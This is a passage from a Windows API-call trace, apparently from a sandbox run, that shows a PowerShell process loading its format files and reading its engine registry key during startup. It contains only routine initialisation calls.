	[0296.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0296.344] SetErrorMode (uMode=0x1) returned 0x1
	[0296.344] SetErrorMode (uMode=0x1) returned 0x1
	[0296.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0296.344] SetErrorMode (uMode=0x1) returned 0x1
	[0296.344] SetErrorMode (uMode=0x1) returned 0x1
	[0296.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0296.344] SetErrorMode (uMode=0x1) returned 0x1
	[0296.344] SetErrorMode (uMode=0x1) returned 0x1
	[0296.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0296.344] SetErrorMode (uMode=0x1) returned 0x1
	[0296.345] SetErrorMode (uMode=0x1) returned 0x1
	[0296.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0296.345] SetErrorMode (uMode=0x1) returned 0x1
	[0296.345] SetErrorMode (uMode=0x1) returned 0x1
	[0296.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0296.345] SetErrorMode (uMode=0x1) returned 0x1
	[0296.345] SetErrorMode (uMode=0x1) returned 0x1
	[0296.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0296.345] SetErrorMode (uMode=0x1) returned 0x1
	[0296.346] SetErrorMode (uMode=0x1) returned 0x1
	[0296.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0296.346] SetErrorMode (uMode=0x1) returned 0x1
	[0296.346] SetErrorMode (uMode=0x1) returned 0x1
	[0296.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0296.346] SetErrorMode (uMode=0x1) returned 0x1
	[0296.346] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0296.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.346] CoTaskMemFree (pv=0x2468a0) 
	[0296.349] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0296.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.349] CoTaskMemFree (pv=0x2468a0) 
	[0296.349] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0296.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.349] CoTaskMemFree (pv=0x2468a0) 
	[0296.350] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0296.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.350] CoTaskMemFree (pv=0x2468a0) 
	[0296.350] SetErrorMode (uMode=0x1) returned 0x1
	[0296.350] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0296.350] GetFileType (hFile=0x304) returned 0x1
	[0296.350] SetErrorMode (uMode=0x1) returned 0x1
	[0296.350] GetFileType (hFile=0x304) returned 0x1
	[0296.350] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0296.352] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0296.352] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0296.352] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0296.353] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0296.353] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0296.353] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x9e2, lpOverlapped=0x0) returned 1
	[0296.353] ReadFile (in: hFile=0x304, lpBuffer=0x33ac802, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ac802*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0296.353] ReadFile (in: hFile=0x304, lpBuffer=0x33ad2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33ad2b8*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0296.353] SetErrorMode (uMode=0x1) returned 0x1
	[0296.354] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0296.354] SetErrorMode (uMode=0x1) returned 0x1
	[0296.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0296.354] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x304) returned 0x0
	[0296.354] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0296.354] CoTaskMemAlloc (cb=0x5a) returned 0x2deea0
	[0296.354] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x2deea0, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0296.354] CoTaskMemFree (pv=0x2deea0) 
	[0296.354] RegCloseKey (hKey=0x304) returned 0x0
	[0296.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0296.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.044] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x4b615b0b, Data2=0x6bb8, Data3=0x4de8, Data4=([0]=0xb9, [1]=0x4, [2]=0xc8, [3]=0xda, [4]=0x88, [5]=0xb5, [6]=0xb2, [7]=0x74))) returned 0x0
	[0297.048] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa771339d, Data2=0x81b8, Data3=0x4018, Data4=([0]=0xb8, [1]=0x60, [2]=0xa8, [3]=0xb7, [4]=0x3b, [5]=0x52, [6]=0x13, [7]=0x28))) returned 0x0
	[0297.049] SetErrorMode (uMode=0x1) returned 0x1
	[0297.049] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0297.049] GetFileType (hFile=0x304) returned 0x1
	[0297.049] SetErrorMode (uMode=0x1) returned 0x1
	[0297.050] GetFileType (hFile=0x304) returned 0x1
	[0297.050] ReadFile (in: hFile=0x304, lpBuffer=0x33d7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d7e20*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.050] ReadFile (in: hFile=0x304, lpBuffer=0x33d7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d7e20*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.050] ReadFile (in: hFile=0x304, lpBuffer=0x33d7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d7e20*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.051] ReadFile (in: hFile=0x304, lpBuffer=0x33d7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d7e20*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.051] ReadFile (in: hFile=0x304, lpBuffer=0x33d7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d7e20*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.052] ReadFile (in: hFile=0x304, lpBuffer=0x33d7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d7e20*, lpNumberOfBytesRead=0x1cd398*=0xfb2, lpOverlapped=0x0) returned 1
	[0297.052] ReadFile (in: hFile=0x304, lpBuffer=0x33d753a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d753a*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0297.052] ReadFile (in: hFile=0x304, lpBuffer=0x33d7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33d7e20*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0297.052] SetErrorMode (uMode=0x1) returned 0x1
	[0297.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0297.053] SetErrorMode (uMode=0x1) returned 0x1
	[0297.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0297.053] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x304) returned 0x0
	[0297.053] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0297.053] CoTaskMemAlloc (cb=0x5a) returned 0x2deea0
	[0297.053] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x2deea0, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0297.053] CoTaskMemFree (pv=0x2deea0) 
	[0297.053] RegCloseKey (hKey=0x304) returned 0x0
	[0297.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0297.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0297.055] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xb580dcde, Data2=0x10ab, Data3=0x4f51, Data4=([0]=0xbf, [1]=0xbc, [2]=0x69, [3]=0x2a, [4]=0x1d, [5]=0x74, [6]=0x5c, [7]=0xa2))) returned 0x0
	[0297.056] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x21a98ef1, Data2=0x9670, Data3=0x4eda, Data4=([0]=0x84, [1]=0xe, [2]=0x8, [3]=0x27, [4]=0xa1, [5]=0x20, [6]=0x85, [7]=0x22))) returned 0x0
	[0297.057] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xb361afe9, Data2=0x25b8, Data3=0x4689, Data4=([0]=0x94, [1]=0x44, [2]=0xa6, [3]=0xd6, [4]=0xd3, [5]=0x7f, [6]=0x86, [7]=0xdf))) returned 0x0
	[0297.057] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x91fa3d6c, Data2=0xe093, Data3=0x4f7b, Data4=([0]=0xb3, [1]=0x28, [2]=0x37, [3]=0x8d, [4]=0xb, [5]=0xd3, [6]=0xc, [7]=0xf4))) returned 0x0
	[0297.057] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8b40fe77, Data2=0x9b45, Data3=0x4fac, Data4=([0]=0xb3, [1]=0x44, [2]=0x4e, [3]=0x77, [4]=0x3d, [5]=0x20, [6]=0x32, [7]=0xad))) returned 0x0
	[0297.057] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe8d09f16, Data2=0x7fc2, Data3=0x479b, Data4=([0]=0x9e, [1]=0x6a, [2]=0x90, [3]=0x45, [4]=0x81, [5]=0xbf, [6]=0x77, [7]=0xd8))) returned 0x0
	[0297.057] SetErrorMode (uMode=0x1) returned 0x1
	[0297.057] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0297.058] GetFileType (hFile=0x304) returned 0x1
	[0297.058] SetErrorMode (uMode=0x1) returned 0x1
	[0297.058] GetFileType (hFile=0x304) returned 0x1
	[0297.058] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.058] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.059] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.059] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.060] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.060] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0297.060] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0xaca, lpOverlapped=0x0) returned 1
	[0297.060] ReadFile (in: hFile=0x304, lpBuffer=0x34231b2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x34231b2*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0297.060] ReadFile (in: hFile=0x304, lpBuffer=0x3423b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3423b80*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0297.061] SetErrorMode (uMode=0x1) returned 0x1
	[0297.061] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0297.061] SetErrorMode (uMode=0x1) returned 0x1
	[0297.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.061] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x304) returned 0x0
	[0297.062] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0297.062] CoTaskMemAlloc (cb=0x5a) returned 0x2deea0
	[0297.062] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x2deea0, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0297.062] CoTaskMemFree (pv=0x2deea0) 
	[0297.062] RegCloseKey (hKey=0x304) returned 0x0
	[0297.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
